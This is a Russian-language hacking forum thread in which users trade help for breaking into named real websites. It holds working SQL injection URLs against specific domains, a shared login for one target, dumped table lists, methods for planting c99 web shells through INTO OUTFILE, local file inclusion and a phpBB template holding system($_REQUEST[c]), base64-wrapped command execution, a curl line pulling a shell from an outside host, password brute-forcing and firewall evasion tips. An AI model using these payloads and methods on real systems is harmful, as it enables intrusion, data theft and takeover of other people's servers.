вопрос не очень то корректный, если на сайте интерпретируются только скрипты cfm, то искать панели пхп не имеет смысла

взгляните опытным взглядом

http://www.pwlvl.ru/news/?page=-2

я его раньше ломал, потом ту дырку прикрыли (остался долько логин и md5(пароль) админа))

asql said:
взгляните опытным взглядом
http://www.pwlvl.ru/news/?page=-2
я его раньше ломал, потом ту дырку прикрыли (остался долько логин и md5(пароль) админа))


Там нету скули. intval()

Привет.

На сайте есть инъекция (mssql) в POST запросе (при редактировании профиля). Как я понял инъекция в операторе UPDATE...

addressDef=-1,'0','0','0','0','0','0','0','0';waitfor+delay+'0 0:00:10'--

Есть ли возможность получать данные если на место waitfordelay влепить select @@version к примеру? Пробовал конвертировать в int - ошибки не возникало...

Apache Tomcat/6.0.26

есть какой-то сплоит?

rootmd said:
Apache Tomcat/6.0.26
есть какой-то сплоит?


link (http://www.google.ru/search?hl=ru&source=hp&biw=1400&bih=959&q=apache+tomcat+6.0.26+exploit&aq=1&aqi=g4&aql=&oq=Apache+Tomcat%2F6.0.26)

да я это видел но нигде нету конкретного примера

rootmd said:
да я это видел но нигде нету конкретного примера


а никто тебе конкретно не даст...а приват палить никто не будет (если он есть)..

Вот нашел, в метасплойт есть, попробуем! )

Залил шелл через админку кмс (засунул шелл в шаблон)

захожу на него все ок - шелл полностью работает.

дальше заливаю шелл отдельно от шаблона, файл залился

НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.

т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.

дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.

все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.

safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...

система freebsd

помогите, не знаю что и думать

eD"]
[R]eD said:
Залил шелл через админку кмс (засунул шелл в шаблон)
захожу на него все ок - шелл полностью работает.
дальше заливаю шелл отдельно от шаблона, файл залился
НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.
т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.
дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.
все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.
safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...
система freebsd
помогите, не знаю что и думать


.htaccess

В .htaccess ничего нету кроме AddDeafultCharset UTF-8

// мда.. сломал сайт вобщем, подожду пока админы поправят чтобы еще попробывать что-нибудь...

подскажите, как вывести file_priv?

пробую

http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,file_priv,4,5,6,7,8+from+mysq l.user+where+user=0x755f6e6577686f72697a6f6e--

никак не получаетса

с чего ты решил что у тебя доступ к ней?

http://www.newhorizons.com.ua/news_detail.php?id=-100+union+select+1,2,3,4,5,6,7,8+from+mysql.user--+

как узнать полный путь от сервера к сайту ? есть доступ к pma

foozzi said:
как узнать полный путь от сервера к сайту ? есть доступ к pma


почти всегда есть файл phpinfo.php в корневой директории пма (если админ не удалил,то оно там лежит по дефолту)

http://site.com/phpmyadmin/phpinfo.php

Konqi said:
почти всегда есть файл phpinfo.php в корневой директории пма
http://site.com/phpmyadmin/phpinfo.php


увы, такого не имеется( а точней выбивает белую страницу пустую

foozzi said:
увы, такого не имеется( а точней выбивает белую страницу пустую


нужно быть авторизованным в ПМА, для заглядывания пхпинфо

я авторизован, всеравно белая страница

foozzi said:
я авторизован, всеравно белая страница


какая там версия ПМА ? пробуйте раскрытие путей из этой темы

http://forum.antichat.net/thread50669.html

если есть привилегии чтения/запись файлов для твоего пользователя mysql, пробуй читать лог файлы

почти такой же вопрос. как узнать путь для заливки шелла (/home/www/img/shell.php),если ошибки в основном вида


Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 10000' at line 1

. Права file_priv есть

Версия MySQL-клиента: 5.0.51a

при раскрытии любых указаных путей в той теме отображается пустая страница даже без ошибки

сайт с инклудом ../../../../var/www/default/mysql_data.php

пробовал SELECT '' into outfile '/var/www/tmp/c99.php'

Moriarty said:
Круто, не глядя сразу в /var писать! В /tmp попробуй сперва...
Значит файл существует, видимо пустой =О


в /tmp/ сразу залил

и еще один тупой впорос как теперь сам шелл юзануть?

kemtipp.ru ломаешь?

Compton said:
почти такой же вопрос. как узнать путь для заливки шелла (/home/www/img/shell.php),если ошибки в основном вида

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 10000' at line 1

. Права file_priv есть


Несколько вариантов:

1) Просканить сканером директорий с целью найти phpinfo или файл который открыть по прямому пути выдает ошибку.

2) Вставить спецсимволы в сесии\куки в надежде, что они не проверяються и ошибки не выключены. Выведет ошибку с путем.

3) Раз уж есть file_priv, то читайте /etc/passwd. Найти там путь возможно. Или найти access_log (error_log), там тоже могут быть пути, и если пути такого плана: /usr/sitename.ru/www то просто вставить вместо sitename.ru доменное имя уязвимого сайта. Или опять же проскать через load_file в поисках httpd.conf, там есть деректива, в которой указан путь обычно или виртуальный хост хотя бы.

4) Поиск вывода ошибок на соседних сайтах найденных через Reverse IP. Если путь вида, в котором учавствует доменное имя, то включаем логику Если же путь типа /usr/user100500/www то пробовать по-другому найти.

Но раз уж есть file_priv, то через /etc/passwd возможно найти путь

rootmd said:
kemtipp.ru ломаешь?


я не вандал, только в учебных целях)

залил я шелл таким образом SELECT '' into outfile '/tmp/c99.php'

как теперь в него зайти

Либо искать локальный инклуд, либо найти папку с правами, доступную из-под веба.

mailbrush said:
Либо искать локальный инклуд, либо найти папку с правами, доступную из-под веба.


можно поподробней?

LFI (Local File Include) - это тип уязвимости. Подробнее в поиске.

Папка с правами - папка, в которую возможно записать что-либо, и которая доступна из-под веба.

Как здесь хоть что то вывести?

http://pocketbook.by/index.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15--

asql said:
Как здесь хоть что то вывести?
http://pocketbook.by/index.php?id=-200+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15--



http://pocketbook.by/index.php?id=200+and+(select+1+from+(select+count( 0),concat((select+version()),floor(rand(0)*2))+fro m+(select+1+union+select+2+union+select+3)x+group+ by+2+limit+1)a)+--+

Duplicate entry '5.0.51a-24+lenny4-log1' for key 1

Заливаю шелл через форму отправки изображений. При загрузке имя файла меняется на .jpg/.gif и т.д. Знаю папку куда все складывается,но прямого доступа к ней не имею. Шелл с расширением .php.jpg переименовывается в .jpg + замена имени. Как быть?

Compton said:
Заливаю шелл через форму отправки изображений. При загрузке имя файла меняется на .jpg/.gif и т.д. Знаю папку куда все складывается,но прямого доступа к ней не имею. Шелл с расширением .php.jpg переименовывается в .jpg + замена имени. Как быть?



https://rdot.org/forum/showpost.php?p=1142&postcount=6

Какая здесь версия БД?

http://www.carolinarentalsonline.com/detail.asp?id=43

Ребят задался вопросом. Есть ли по дефолту в вин2008, число неудачных попыток входов в систему, после чего лок? Просто 3-и сутки медузой перебираю безрезультатно (Хотя знаю, что в словаре точно есть правильный пасс)

Здесь вывести через ошибку возможно?

https://www.nyhistory.org/web/default.php?section=public_programs&page=detail&program=1499350+%6f%72%64%65%72+by+1000+--+

Имеется sqli в mssql без вывода ошибки.

Сайт: www.truck market.ru

Перед проведением атаки следует вторизоваться тут: http://www.truckmarket.ru/enter.php. Например по этому акку: login:a1840198 pass:a1840198

sqli:


/reg.php?id=355569+and+1=1


По логике: если запрос верен - в текстбокстах отображается уже имеющаяся инфа.

Ступор на получении списка таблиц. Получаем одну так:


/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES



Далее пробую сначала брать следующию так:


/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mb_spare_ua%27




/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mboards%27


Но удается выудить только три, потом идет повтор:


mb_spare_ua
mboards
MbTopics_ForDel
MbTopics_ForDel
...




/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME+NOT+IN+('mb_spare_ua','mboards','ATIForums_ Forum')
-- ATIForums_Forum


Опять повтор. Почитал доки. select top - возвращает случайныую запись. Умельцы как-то убирают случайность, добовляя в конец order+by+. Но я не докурил как =(

Подставляя случайные слова в первый методе смог получить вот такой список таблиц:


MbTopics_ForDel
WebService
WebServiceClient
WindRose
mb_spare_ua
mboards
ATIForums_Forum
Кузова
Марки транспорт
RegionCodes
WarnTypes
MSP_TIMEPHASED_DATA --(Вывело MSP_TIMEPHASED_, но гугл указал что это дефолт таблица MSP_TIMEPHASED_DATA)
ways
waysinfo


Как вытащить все таблицы? Мне бы увидеть пример имуляции limit, вывести колонки и инфу думаю смогу сам.

p.s

Проблема с данной уязвимостью, уже постилась на rdot.org

Но 2ва дня не кто помочь не может.

Как можно это обработать на "чистый" лист?

http://www.elitecrownmoldings.com/home.php?cat=6

кстати, тут походу у пользователя есть права на INSERT =)

и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?

залили шелл через pma

узнал путь /var/lib/mysql/tmp/c99.php

но теперь как шелл то сам юзануть?

foozzi said:
залили шелл через pma
узнал путь /var/lib/mysql/tmp/c99.php
но теперь как шелл то сам юзануть?


инклюд локальный, больше никак ...

asql said:
Как можно это обработать на "чистый" лист?
http://www.elitecrownmoldings.com/home.php?cat=6
кстати, тут походу у пользователя есть права на INSERT =)
и еще вопросик, как можно узнать привилегии пользователя mysql, ну и других дб?


Дело не в правах пользователя на INSERT, а в том что в уязвимый запрос входит команда INSERT.

Могу сказать, что INSERT-иньекцию провести не удасться, т.к. в запрос входит путь, который подделать\обрезать не возможно.


Code:
/product.php?prod'uctid=256 => INSERT INTO xcart_stats_pages(page) VALUES('/product.php?prod'uctid=256')
/pro'duct.php?productid=256 => Not Found

Мдя уж, забавно

По поводу привилегий:

Максимальный привелегии, что у тебя могут быть (которые помогаю в SQLi) это доступ на чтение mysql.user, чтобы узнать пасс админа MySQL и подключиться удаленно\к phpMyAdmin, если есть, ну или пробрутить FTP\SSH.

Ну или file_priv, что тебе позволяет читать файлы, а при отсутсвие mq, то и заливать файлы

Ну и обычно если есть доступ к mysql.user, то и есть доступ в file_priv.

Ну и по поводу раскручивания данной инъекции.

Запрос выдает ошибку только при кавычке подставленной, если ее нет, то все отбрасываеться.

Попробуй избавиться от ошибки при кавычке.


foozzi said:
залили шелл через pma
узнал путь /var/lib/mysql/tmp/c99.php
но теперь как шелл то сам юзануть?


Ты залил шелл в /tmp, в котором храняться файлы сессий, к которому нету доступа из под веба, то есть никак не прочитать (ну если нету LFI\RFI). Попробуй просканить сайт на директории, посмотри в каких папках лежат картинки\js\css \etc и пробуй залить во все эти диры, ведь я, надеюсь, у тебя есть путь к сайту? Если нету то читай мой пост пару страниц ниже...

Lijzer said:
инклюд локальный, больше никак ...


нашол путь тот который надо

http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php

но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто

пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет

foozzi said:
нашол путь тот который надо
http://www.xxx.ru/show.php?f=../../../../var/lib/mysql/c99.php
но там пустая страница, тоесть меню сайта и шапка есть а там где контент пусто
пробовал залить в js (такая папка есть) но не могу точный путь найти к ней, читал etc/passwd там ничего такого нет


DirBuster тебе в помощь...

как можно залить шелл в PhpBB версии 3.0.8 имея доступ в админку

Гугл не помог

noviyuser said:
как можно залить шелл в PhpBB версии 3.0.8 имея доступ в админку
Гугл не помог


google.ru > Заливка шелла phpbb3 site:forum.antichat.ru

google.ru > Заливка шелла phpbb3 site:rdot.org

гуглим правильно (с)

Заливка шела через темплейты в phpBB3 (необходим доступ в админку).

1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).

2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:

system($_REQUEST[c]);

Источник (https://rdot.org/forum/showthread.php?t=4)

stan_q said:
Заливка шела через темплейты в phpBB3 (необходим доступ в админку).
1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:

system($_REQUEST[c]);

Источник (https://rdot.org/forum/showthread.php?t=4)




SQL ERROR [ mysqli ]
Incorrect string value: '\xC1\xF0\xFF\xED\xF1\xEA...' for column 'template_data' at row 1 [1366]
INSERT INTO phpbb3_styles_template_data (template_id, template_filename, template_included, template_mtime, template_data) VALUES (1, 'overall_footer.html', 'confirm_body.html:faq_body.html:index_body.html:l ogin_forum.html:mcp_approve.html:mcp_footer.html:m cp_move.html:memberlist_body.html:memberlist_email .html:memberlist_leaders.html:memberlist_view.html :message_body.html
osting_layout.html
rime_delete_confirm.html:report_body.html:reputati on_body.html:search_body.html:search_results.html: thankslist_body.html:thanks_results.html:toplist_b ody.html:ucp_agreement.html:ucp_footer.html:ucp_re mind.html:ucp_resend.html:viewforum_body.html:view online_body.html:viewtopic_body.html:gallery_foote r.html
ortal_body.html:stats_footer.html:', 1294949740, '
блабла
BACKTRACE
FILE: includes/db/mysqli.php
LINE: 163
CALL: dbal->sql_error()
FILE: includes/acp/acp_styles.php
LINE: 2624
CALL: dbal_mysqli->sql_query()
FILE: includes/acp/acp_styles.php
LINE: 3661
CALL: acp_styles->store_templates()
FILE: includes/acp/acp_styles.php
LINE: 3628
CALL: acp_styles->_store_in_db()
FILE: includes/acp/acp_styles.php
LINE: 774
CALL: acp_styles->store_in_db()
FILE: includes/acp/acp_styles.php
LINE: 180
CALL: acp_styles->edit_template()
FILE: includes/functions_module.php
LINE: 507
CALL: acp_styles->main()
FILE: adm/index.php
LINE: 78
CALL: p_master->load_active()


что неправильно сделано?

Code:
http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,?,4,5,6,7+from+users+limit+0,1--

не могу найти колонку с именем юзера

Compton said:

Code:
http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,?,4,5,6,7+from+users+limit+0,1--

не могу найти колонку с именем юзера


information_schema доступна, в чём проблема?

baobabeng said:
information_schema доступна, в чём проблема?




Code:
http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+infor mation_schema.columns+where+table_name='users'--

или я что-то не так делаю?

Compton said:

Code:
http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+infor mation_schema.columns+where+table_name='users'--

или я что-то не так делаю?


зачарь

http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,group_concat(column_name),4,5, 6,7+from+information_schema.columns+where+table_na me=char(117,115,101,114,115)

users=char(117,115,101,114,115)

Compton said:

Code:
http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+infor mation_schema.columns+where+table_name='users'--

или я что-то не так делаю?


http://www.vierkanteogen.nl/games/index.php?game_id=-51+union+select+1,2,column_name,4,5,6,7+from+infor mation_schema.columns+where+table_name=0x757365727 3--

при нахождении столбцов через order_by и последующей комбинации их с union select вылетаешь ошибка


Code:
The used SELECT statements have a different number of columns

что можно сделать?

Compton said:
при нахождении столбцов через order_by и последующей комбинации их с union select вылетаешь ошибка

Code:
The used SELECT statements have a different number of columns

что можно сделать?


2 запроса. Крути через ошибку. Или линк сюда.

http://forum.antichat.net/thread43966.html последний пост от Scipio.

Через ошибку:


Code:
http://www.cosmeticsdatabase.com/brand.php?brand_id=987%20or%201%20group%20by%20con cat((select%20version()),floor(rand(0)*2))%20havin g%20min(0)%20or%201%20--%201

С прямым выводом:


Code:
http://www.cosmeticsdatabase.com/ingredient.php?ingred06=-705545%20union%20select%201,2,3,4,5,6,7,8,version( ),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+



XAMEHA said:
Для начала надо сделать чтоб линк все видели:

PHP:
http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7, 8--





Жмешь "QUOTE" и смотришь что он там написал в теге

Фараон said:
2 запроса. Крути через ошибку. Или линк сюда.


http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7, 8--

Compton said:
http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7, 8--


Для начала надо сделать чтоб линк все видели:


PHP:
http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7, 8--

При проверке file_priv выдалось

SELECT command denied to user 'g4rt'@'localhost' for table 'user'

это типа в доступе к file_priv отказано, да?

При проверке file_priv выдалось
SELECT command denied to user 'g4rt'@'localhost' for table 'user'
это типа в доступе к file_priv отказано, да?


Это значит что отказано в доступе к базе данных под именем "mysql" и к таблице "mysql.user" в частности, соответственно, в большинстве случаев file_priv тоже нет.

Привет всем!

В общем захотелось заняться пентестом джумлы)

нашел на сайте уязвимый Joomla Kunena Forums

также для него нашел эксплойт под BSQL

http://www.exploit-db.com/exploits/9408/

Подскажите пожалуйста как заюзать эксплойт?

в эксплойте написано


Usage: target.php [site][SQL]


понятно что юзать скрипт надо по шаблону вида

exploit.php?site=http://joomlasite.... но вот не понятно на какую именно страницу надо передавать!

Может кто пояснить?

на страницу, в которой есть уязвимый параметр. и передавать нужно последним параметр(в случае если их несколько)

http://www.rxinternational.com/pricelist.asp?mscquery=spray'

не могу раскрутить

pinch said:
http://www.rxinternational.com/pricelist.asp?mscquery=spray'
не могу раскрутить


Microsoft Access

Рекомендую прочесть эту статью:

/threadnav50550-1-10.html

http://minysa.ru/infusions/mp3/song.php?song_id=-340'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19--'

При вставке слов страница не загружается, как обойти?

скобки нельзя использовать


Code:
http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,@@version,3,4,5,6,7,8,9,10,1 1,12,13,14%20,15,16,17,18,19--%27

предсказывая следующий вопрос, можно сделать так:


Code:
http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,table_name,3,4,5,6,7,8,9,10, 11,12,13,14%20,15,16,17,18,19+from+information_sch ema.tables+limit+17,1--%20%27

Возможно ли вотэто как либо использовать?

http://www.gamereplays.org/community/index.php?act=SF&f=99999999

asql said:
Возможно ли вотэто как либо использовать?
http://www.gamereplays.org/community/index.php?act=SF&f=99999999


Нет, данная переменная принимает только числа.

Может начнем статьи читать и немного изучим PHP + MySQL?

//и начнём читать статьи прежде чем задать вопрос

можно ли через phpmyadmin 2.8.0.3 залить шелл не зная полного пути? с примером пожалуйста

Объясните плиз вот это

/showpost.php?p=1323558&postcount=12

noviyuser said:
можно ли через phpmyadmin залить шелл не зная полного пути? с примером пожалуйста


Ты же уже спрашивал!

Если говорят люди "надо узнать полный путь", как думаешь можно!? НЕТ! Максимум, не зная пути, ты можешь залить шелл в /tmp и если есть инклюд, то проинклюдить его!


noviyuser said:
Объясните плиз вот это
/showpost.php?p=1323558&postcount=12


А что тут объяснять? Это эксплоит написанный на Баше, который эксплуатируею уязвимость выполнения PHP-кода в версиях phpMyAdmin 2.11.x - 2.11.9.5; 3.x - 3.1.3.1.

Ну и как бы там есть еще список зависимостей:


Code:
# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

спс, есть таблица blabla-forum, делаю

+from+blabla-forum.phpbb_users+--+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.phpbb_users -- LIMIT 0, 1' at line 1

Как обойти? он видимо думает что черта это конец запроса поэтому ошибка вылазит?

+from+`blabla-forum`.phpbb_users+--+

noviyuser said:
спс, есть таблица blabla-forum, делаю
+from+blabla-forum.phpbb_users+--+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.phpbb_users -- LIMIT 0, 1' at line 1
Как обойти? он видимо думает что черта это конец запроса поэтому ошибка вылазит?


Эм.... "есть таблица blabla-forum" => "blabla-forum.phpbb_users" - это что еще за фокусы? о_0 У ТАБЛИЦЫ не может быть ТАБЛИЦЫ, таблицы находяться в DataBase'ах. И запрос имеет вид: [database].[table_name]. Узнать текущую DB можно через database(). А как узнать в какой DB находиться нужная таблица, ЧИТАЙТЕ СТАТЬИ, коих полно на античате. И сразу будет меньше вопросов и вам будет легче.

http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&type=99999+union+select+1--

Order by определяет 1 столбик, но при попытке вывести его через union select печатает ошибку

The used SELECT statements have a different number of columns

похожее...


Compton said:
http://www.cosmeticsdatabase.com/brand.php?brand_id=987+union+select+1,2,3,4,5,6,7, 8--

http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&type=1+or+1+group+by+concat(version(),floor(rand(0 )*2))having+min(0)+or+1--+

http://www.cosmeticsdatabase.com/brand.php?brand_id=987+or+1+group+by+concat(versio n(),floor(rand(0)*2))having+min(0)+or+1--+

Ребят опять подыму вопрос свой т.к. ни одного ответа не было /showpost.php?p=2594004&postcount=16594

asql said:
http://www.irm.lg.ua/tovar.php?page=1&tfirma=&tclass=1&tfind=&ttype=0&type=99999+union+select+1--
Order by определяет 1 столбик, но при попытке вывести его через union select печатает ошибку
The used SELECT statements have a different number of columns


Такое происходит, потому что данный уязвимый GET-параметр участвует в нескольких запросах к разным таблицам, с разным кол-вом полей.

Т.е. в одном запросе ты подобрал правильно кол-во колонок, в другом нет, поэтому ошибка.

Бывают случаи, когда участвует так же несколько запросов, и ты подобрал кол-во колонок, но он вывел ошибку и при этом вывел принтабельное поле. Если же такое кол-во подобрать не удалось, то крутить как BLIND.

eD"]
[R]eD said:
Залил шелл через админку кмс (засунул шелл в шаблон)
захожу на него все ок - шелл полностью работает.
дальше заливаю шелл отдельно от шаблона, файл залился
НО, при заходе на него вылазит ошибка 500 ( Premature end of script headers: в error.log ) и так на все новые залитые .php файлы, если залить .txt все ок (пробывал чтобы пхп обрабатывал тхт как скрипт, проблема остается). Пробывал менять chmod (0777/0755/0700) результата 0.
т.е. править скрипты можно, но заливать скрипты чтобы они выполнялись нет.
дело явно не в содержании шелла, если вписать 123 и назвать файл asd.php он всеравно выдаст ошибку.
все остальные файлы в директории (которые были до меня) выполняются отлично, если отредактировать один из такхи файлов то тоже все работает, но нужно именно залить отдельно шелл.
safe mode выключен, все папки открыты на запись, вобщем свиду все нормально...
система freebsd
помогите, не знаю что и думать


вобщем перепробывал все, единственное отличие заливаемых файлов это Owner/Group у моих файлов site/xxx а у остальных site/yyy, но если редактировать уже имеющиеся файлы то все ок.

вылазит все таже Premature end of script headers, как это с правами на файлы связано не ясно...

если заливать простые файлы например .тхт то все ок, выставляешь 0755 права и они открываются (пробывал чтобы обрабатывались как php-script ошибка все также)

что можно сделать?

как можно обойти, делаю

cmd=wget http://xxx.com/shell.php


Method Not Implemented
GET to /forum/profile.php not supported.


делаю

cmd=ls >>> нормально работает

cmd=ls -la >>> ошибка вылазит


Not Found
The requested URL /forum/profile.php was not found on this server.


через GET и POST пробовал

noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал


пробуй курлом

curl http://site.com/shell.php > /var/www/html/shell.php

Warning: simplexml_load_file() [function.simplexml-load-file]: I/O warning : failed to load external entity "/home/site.ru/docs/news/news/(тут все что хочу)"

можно как-то читать файлы и т д?

Не выйдет ничего. Если файл, который ты хочешь прочитать некорректный xml(а он, разумеется, будет некорректным ), то получишь false

http://www.spravkaweb.ru/php/datafun/xml/simplexml/simplexml_load_file

noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал


Была как-то такая же проблема решилась, так:

eval(base64_decode($_POST[cmd])); =>> cmd = c3lzdGVtKCdscyAtbGEnKTs= system('ls -la');

А ты уверен, кстати, что wget есть? Проверь так: which wget

Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ


does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.


Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.

noviyuser said:
как можно обойти, делаю
cmd=wget http://xxx.com/shell.php
делаю
cmd=ls >>> нормально работает
cmd=ls -la >>> ошибка вылазит
через GET и POST пробовал


Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.

Lijzer said:
Столкнулся с проблемой. На сайте mod_rewrite стоит, посылаю постом невалидное Content-length, в ответ Гетом тоже самое, это меня модсекурити режит(хотя на других ресурсах все как надо, в ответ получаю линк) ? И вопрос номер 2 посоветуйте, кто чем пользуеться для фаззинга.


Судя по всему, тебя режет директива Mod Security SecRequestBodyLimit, которая проверяет, чтобы размер тела запроса не превышал указанного значения.

http://www.ptsecurity.ru/download/modrewrite_search.zip

Redwood said:
Сервер защищен Mod Security. По дефолту Mod Security не фильтрует значения Cookies, пробуй передать через них.



спасибо а можно примерчик?

Не могу понять как в этом примере вывести information_schema

http://www.airport.lg.ua/index.php?page=3+or+1+group+by+concat(concat_ws(0x 3a3a3a,version(),user(),database()),floor(rand(0)* 2))having+min(0)--+

и вот еще

http://www.tis.lg.ua/index.php?mod=page&page=-23'/**//*!union*//**//*!select*//**/1,concat_ws(0x3a3a3a,version(),user(),database()), 3,4--'

при выводе information_schema, ошибка

Заранее спс

Помогите раскрутить!


http://zombie.cloud9crew.com/index.php/component/kunena/advsearch?q=hilfe&catids=1%27

asql said:
Не могу понять как в этом примере вывести information_schema
http://www.airport.lg.ua/index.php?page=3+or+1+group+by+concat(concat_ws(0x 3a3a3a,version(),user(),database()),floor(rand(0)* 2))having+min(0)--+
Заранее спс


http://www.airport.lg.ua/index.php?page=-3+union+select+group_concat(0x0b,table_name)+from+ information_schema.tables+where+table_schema!=0x69 6e666f726d6174696f6e5f736368656d61+--+

aero_buttons,

aero_pages,

aero_pics_pages,

aero_texts

Помогите составить запрос. Есть 5 бд, в бд 'de' есть таблица drupal_users, и там есть поля pass,access,login.

При запросе +or+1+group+by+concat((select+concat( login,0x3a,pass)+from+drupal_users+limit+0,1),floo r(rand(0)*2))having+min(0)+or+1+--+

запрос идет в 'de' а в другую бд.

asql said:
и вот еще
http://www.tis.lg.ua/index.php?mod=page&page=-23'/**//*!union*//**//*!select*//**/1,concat_ws(0x3a3a3a,version(),user(),database()), 3,4--'
при выводе information_schema, ошибка
Заранее спс


http://www.tis.lg.ua/index.php?mod=page&page=-23'+union+select+1,group_concat(0x0b,table_name),3 ,4+from+information_schema.tables+where+table_sche ma!=0x696e666f726d6174696f6e5f736368656d61+--+

gb_aut,

gb_ip,

gb_msg,

gb_settings,

lib_mat,

lib_plan,

lib_razdel,

lib_reelt,

lib_status,

lib_tip,

newnews,

page,

phonebook,

photo,

pr_dom,

pr_kvartira,

pr_nejil,

pr_zemlya

Dima282 said:
Помогите составить запрос. Есть 5 бд, в бд 'de' есть таблица drupal_users, и там есть поля pass,access,login.
При запросе +or+1+group+by+concat((select+concat( login,0x3a,pass)+from+drupal_users+limit+0,1),floo r(rand(0)*2))having+min(0)+or+1+--+
запрос идет в 'de' а в другую бд.


Если я правильно понял эту мысль, то:


Code:
+or+1+group+by+concat((select+concat(access,0x3a,l ogin,0x3a,pass)+from+de.drupal_users+limit+0,1),fl oor(rand(0)*2))having+min(0)+or+1+--+

всё по принципу select+колонки+from+бд.таблица

Подскажите в чем ошибка?

